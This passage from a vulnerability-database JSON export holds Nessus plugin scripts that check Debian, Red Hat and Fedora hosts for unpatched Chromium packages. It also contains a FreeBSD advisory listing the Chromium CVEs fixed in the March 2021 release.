value:\"https://security-tracker.debian.org/tracker/CVE-2021-21173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21187\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21189\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21194\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21198\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21199\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4886\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 89.0.4389.114-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21199\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-30T05:36:58", "description": "An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es) :\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 12, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-11-08T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2019:3775)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-3775.NASL", "href": "https://www.tenable.com/plugins/nessus/130746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3775. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130746);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/29\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"RHSA\", value:\"2019:3775\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2019:3775)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es) :\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:3775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13721\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3775\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-30T02:27:21", "description": "Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 11, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-11-12T00:00:00", "title": "Fedora 31 : chromium (2019-688d52f9ff)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-12T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2019-688D52F9FF.NASL", "href": "https://www.tenable.com/plugins/nessus/130786", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-688d52f9ff.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130786);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/29\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"FEDORA\", value:\"2019-688d52f9ff\");\n\n script_name(english:\"Fedora 31 : chromium (2019-688d52f9ff)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-688d52f9ff\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"chromium-78.0.3904.87-1.fc31\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2021-03-04T13:26:50", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21172", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169"], "description": "\nChrome Releases reports:\n\nThis release includes 47 security fixes, including the below.\n\t Google is aware of reports that an exploit for CVE-2021-21166 exists\n\t in the wild.\n\n[1171049] High CVE-2021-21159: Heap buffer overflow in\n\t TabStrip. Reported by Khalil Zhani on 2021-01-27\n[1170531] High CVE-2021-21160: Heap buffer overflow in\n\t WebAudio. Reported by Marcin 'Icewall' Noga of Cisco Talos on\n\t 2021-01-25\n[1173702] High CVE-2021-21161: Heap buffer overflow in\n\t TabStrip. Reported by Khalil Zhani on 2021-02-02\n[1172054] High CVE-2021-21162: Use after free in WebRTC.\n\t Reported by Anonymous on 2021-01-29\n[1111239] High CVE-2021-21163: Insufficient data validation in\n\t Reader Mode. Reported by Alison Huffman, Microsoft Browser\n\t Vulnerability Research on 2020-07-30\n[1164846] High CVE-2021-21164: Insufficient data validation in\n\t Chrome for iOS. Reported by Muneaki Nishimura (nishimunea) on\n\t 2021-01-11\n[1174582] High CVE-2021-21165: Object lifecycle issue in audio.\n\t Reported by Alison Huffman, Microsoft Browser Vulnerability\n\t Research on 2021-02-04\n[1177465] High CVE-2021-21166: Object lifecycle issue in audio.\n\t Reported by Alison Huffman, Microsoft Browser Vulnerability\n\t Research on 2021-02-11\n[1161144] Medium CVE-2021-21167: Use after free in bookmarks.\n\t Reported by Leecraso and Guang Gong of 360 Alpha Lab on\n\t 2020-12-22\n[1152226] Medium CVE-2021-21168: Insufficient policy\n\t enforcement in appcache. Reported by Luan Herrera (@lbherrera_)\n\t on 2020-11-24\n[1166138] Medium CVE-2021-21169: Out of bounds memory access in\n\t V8. Reported by Bohan Liu (@P4nda20371774) and Moon Liang of\n\t Tencent Security Xuanwu Lab on 2021-01-13\n[1111646] Medium CVE-2021-21170: Incorrect security UI in\n\t Loader. Reported by David Erceg on 2020-07-31\n[1152894] Medium CVE-2021-21171: Incorrect security UI in\n\t TabStrip and Navigation. Reported by Irvan Kurniawan (sourc7) on\n\t 2020-11-25\n[1150810] Medium CVE-2021-21172: Insufficient policy\n\t enforcement in File System API. Reported by Maciej Pulikowski on\n\t 2020-11-19\n[1154250] Medium CVE-2021-21173: Side-channel information\n\t leakage in Network Internals. Reported by Tom Van Goethem from\n\t imec-DistriNet, KU Leuven on 2020-12-01\n[1158010] Medium CVE-2021-21174: Inappropriate implementation\n\t in Referrer. Reported by Ashish Gautam Kamble on 2020-12-11\n[1146651] Medium CVE-2021-21175: Inappropriate implementation\n\t in Site isolation. Reported by Jun Kokatsu, Microsoft Browser\n\t Vulnerability Research on 2020-11-07\n[1170584] Medium CVE-2021-21176: Inappropriate implementation\n\t in full screen mode. Reported by Luan Herrera (@lbherrera_) on\n\t 2021-01-26\n[1173879] Medium CVE-2021-21177: Insufficient policy\n\t enforcement in Autofill. Reported by Abdulrahman Alqabandi,\n\t Microsoft Browser Vulnerability Research on 2021-02-03\n[1174186] Medium CVE-2021-21178: Inappropriate implementation\n\t in Compositing. Reported by Japong on 2021-02-03\n[1174943] Medium CVE-2021-21179: Use after free in Network\n\t Internals. Reported by Anonymous on 2021-02-05\n[1175507] Medium CVE-2021-21180: Use after free in tab search.\n\t Reported by Abdulrahman Alqabandi, Microsoft Browser\n\t Vulnerability Research on 2021-02-07\n[1177875] Medium CVE-2020-27844: Heap buffer overflow in\n\t OpenJPEG. Reported by Sean Campbell at Tableau on 2021-02-12\n[1182767] Medium CVE-2021-21181: Side-channel information\n\t leakage in autofill. Reported by Xu Lin (University of Illinois\n\t at Chicago), Panagiotis Ilia (University of Illinois at Chicago),\n\t Jason Polakis (University of Illinois at Chicago) on\n\t 2021-02-26\n[1049265] Low CVE-2021-21182: Insufficient policy enforcement\n\t in navigations. Reported by Luan Herrera (@lbherrera_) on\n\t 2020-02-05\n[1105875] Low CVE-2021-21183: Inappropriate implementation in\n\t performance APIs. Reported by Takashi Yoneuchi (@y0n3uchy) on\n\t 2020-07-15\n[1131929] Low CVE-2021-21184: Inappropriate implementation in\n\t performance APIs. Reported by James Hartig on 2020-09-24\n[1100748] Low CVE-2021-21185: Insufficient policy enforcement\n\t in extensions. Reported by David Erceg on 2020-06-30\n[1153445] Low CVE-2021-21186: Insufficient policy enforcement\n\t in QR scanning. Reported by dhirajkumarnifty on 2020-11-28\n[1155516] Low CVE-2021-21187: Insufficient data validation in\n\t URL formatting. Reported by Kirtikumar Anandrao Ramchandani on\n\t 2020-12-04\n[1161739] Low CVE-2021-21188: Use after free in Blink. Reported\n\t by Woojin Oh(@pwn_expoit) of STEALIEN on 2020-12-24\n[1165392] Low CVE-2021-21189: Insufficient policy enforcement\n\t in payments. Reported by Khalil Zhani on 2021-01-11\n[1166091] Low CVE-2021-21190: Uninitialized Use in PDFium.\n\t Reported by Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team on\n\t 2021-01-13\n\n\n", "edition": 1, "modified": "2021-03-02T00:00:00", "published": "2021-03-02T00:00:00", "id": "F00B65D8-7CCB-11EB-B3BE-E09467587C17", "href": "https://vuxml.freebsd.org/freebsd/f00b65d8-7ccb-11eb-b3be-e09467587c17.html", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "fedora": [{"lastseen": "2021-04-05T22:43:31", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2021-04-05T00:18:43", "published": "2021-04-05T00:18:43", "id": "FEDORA:BF4FC30A0346", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: chromium-89.0.4389.90-3.fc34", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T22:40:28", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2021-04-01T01:51:39", "published": "2021-04-01T01:51:39", "id": "FEDORA:C67773052A4D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: chromium-89.0.4389.90-3.fc33", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-21T00:08:29", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2021-03-20T01:15:37", "published": "2021-03-20T01:15:37", "id": "FEDORA:A017F3074280", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: chromium-89.0.4389.82-1.fc32", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": 